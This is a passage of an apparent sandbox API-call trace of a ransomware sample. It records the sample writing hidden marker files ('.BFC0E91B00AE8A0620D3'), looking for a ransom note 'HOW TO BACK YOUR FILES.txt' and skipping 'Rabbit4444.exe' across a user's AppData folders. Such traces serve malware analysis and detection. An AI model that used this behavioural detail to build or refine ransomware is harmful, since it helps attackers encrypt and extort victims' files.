dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0060.801] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0060.803] FlushFileBuffers (hFile=0x27c) returned 1 [0060.804] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.804] CloseHandle (hObject=0x27c) returned 1 [0060.805] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\RoamingState") returned 85 [0060.805] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.805] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddc22ee1, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd29620e0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed9107ee, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0060.805] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.805] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.805] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.805] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.805] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddc22ee1, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd29620e0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed9107ee, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.805] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.805] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.805] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.805] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.805] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.805] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed9107ee, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed9107ee, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed9107ee, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.805] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.805] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.805] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed9107ee, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed9107ee, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed9107ee, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0060.805] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0060.805] lstrcpyW (in: lpString1=0x130ebe4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.805] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.devicesflow_cw5n1h2txyewy\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0060.806] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0060.806] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0060.807] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.807] CloseHandle (hObject=0x2a0) returned 1 [0060.807] CloseHandle (hObject=0x27c) returned 1 [0060.807] GetCurrentThreadId () returned 0xd98 [0060.807] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122148 [0060.807] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalState" [0060.807] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118868 | out: hHeap=0xe0000) returned 1 [0060.807] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122140 | out: hHeap=0xe0000) returned 1 [0060.807] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalState" [0060.807] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalState\\" [0060.807] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" [0060.807] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.devicesflow_cw5n1h2txyewy\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0060.808] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0060.810] FlushFileBuffers (hFile=0x27c) returned 1 [0060.811] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.811] CloseHandle (hObject=0x27c) returned 1 [0060.812] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalState") returned 83 [0060.812] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.812] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddc22ee1, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2961813, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed9107ee, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0060.812] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.812] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.812] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.812] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.812] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddc22ee1, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2961813, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed9107ee, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.812] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.812] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.812] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.812] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.812] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.812] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed9107ee, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed9107ee, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed9107ee, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.812] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.813] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.813] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed9107ee, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed9107ee, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed9107ee, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0060.813] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0060.813] lstrcpyW (in: lpString1=0x130ebe0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.813] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.devicesflow_cw5n1h2txyewy\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0060.813] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0060.813] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0060.813] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.814] CloseHandle (hObject=0x2a0) returned 1 [0060.814] CloseHandle (hObject=0x27c) returned 1 [0060.814] GetCurrentThreadId () returned 0xd98 [0060.814] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1221a8 [0060.814] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalCache" [0060.814] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118708 | out: hHeap=0xe0000) returned 1 [0060.814] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221a0 | out: hHeap=0xe0000) returned 1 [0060.814] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalCache" [0060.814] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalCache\\" [0060.814] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" [0060.814] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.devicesflow_cw5n1h2txyewy\\localcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0060.815] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0060.818] FlushFileBuffers (hFile=0x27c) returned 1 [0060.819] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.819] CloseHandle (hObject=0x27c) returned 1 [0060.819] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalCache") returned 83 [0060.819] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.819] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddce1aab, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2960e32, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed936a3b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0060.820] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.820] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.820] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.820] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.820] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddce1aab, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2960e32, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed936a3b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.820] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.820] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.820] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.820] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.820] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.820] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed936a3b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed936a3b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed936a3b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.820] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.820] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.820] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed936a3b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed936a3b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed936a3b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0060.820] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0060.820] lstrcpyW (in: lpString1=0x130ebe0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.820] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\LocalCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.devicesflow_cw5n1h2txyewy\\localcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0060.821] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0060.821] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0060.821] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.821] CloseHandle (hObject=0x2a0) returned 1 [0060.821] CloseHandle (hObject=0x27c) returned 1 [0060.821] GetCurrentThreadId () returned 0xd98 [0060.821] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1220c8 [0060.821] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AppData" [0060.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118658 | out: hHeap=0xe0000) returned 1 [0060.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220c0 | out: hHeap=0xe0000) returned 1 [0060.821] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AppData" [0060.821] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AppData\\" [0060.821] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" [0060.821] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.devicesflow_cw5n1h2txyewy\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0060.822] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0060.825] FlushFileBuffers (hFile=0x27c) returned 1 [0060.826] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.826] CloseHandle (hObject=0x27c) returned 1 [0060.827] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AppData") returned 80 [0060.827] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.827] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddda05d6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2960774, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed936a3b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0060.827] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.827] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.827] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.827] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.827] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddda05d6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2960774, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed936a3b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.827] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.827] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.827] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.827] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.827] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.827] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed936a3b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed936a3b, ftLastAccessTime.dwHighDateTime=0x1d54052, 